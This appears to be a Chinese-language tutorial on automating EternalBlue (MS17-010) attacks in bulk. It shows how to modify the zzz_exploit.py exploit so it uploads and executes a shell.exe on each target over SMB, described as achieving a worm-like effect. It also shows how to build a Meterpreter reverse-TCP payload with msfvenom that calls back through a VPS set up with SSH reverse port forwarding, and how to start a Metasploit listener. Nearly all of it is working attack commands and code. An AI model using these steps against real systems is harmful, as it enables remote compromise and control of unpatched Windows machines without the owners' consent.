永恒之蓝MS17-010批量自动化渗透姿势

克隆GIthub源码

1
git clone https://github.com/LFODER/MS17-010

修改过程

zzz_exploit.py 会在C盘根目录创建 pwded.txt 文件,修改它来执行你的Payload.

1
2
3
4
5
6
7
def smb_pwn(conn, arch):
smbConn = conn.get_smbconnection()
print('creating file c:\\pwned.txt on the target')
tid2 = smbConn.connectTree('C$')
fid2 = smbConn.createFile(tid2, '/pwned.txt')
smbConn.closeFile(tid2, fid2)
smbConn.disconnectTree(tid2)

在此代码段后面加上

1
2
smb_send_file(smbConn, '/opt/shell.exe', 'C', '/shell.exe')     
service_exec(conn, r'cmd /c c:\\shell.exe')

这两行代码的意思是通过SMB发送文件,将 本地的 /opt/shell.exe 发送至被攻击机器的 C:\shell.exe 并执行 shell.exe

最终,在命令行终端 输入 python zzz_exploit.py [IP] 来实施攻击。

被攻击机器会收到来自攻击机发送的恶意文件并执行,从而自动化渗透,实现蠕虫病毒的效果。

场景实例

一台VPS,在VPS上 /etc/ssh/sshd_config最后加上一句GatewayPorts yes

本地执行ssh -R 80:localhost:4444 root@IP将服务器的80端口转发到本地的4444端口

生成Payload

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[VPS IP] LPORT=80 -f exe -o /opt/shell.exe

在msf上启用监听

1
2
3
4
5
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > set LHOST 0.0.0.0
msf exploit(handler) > exploit -j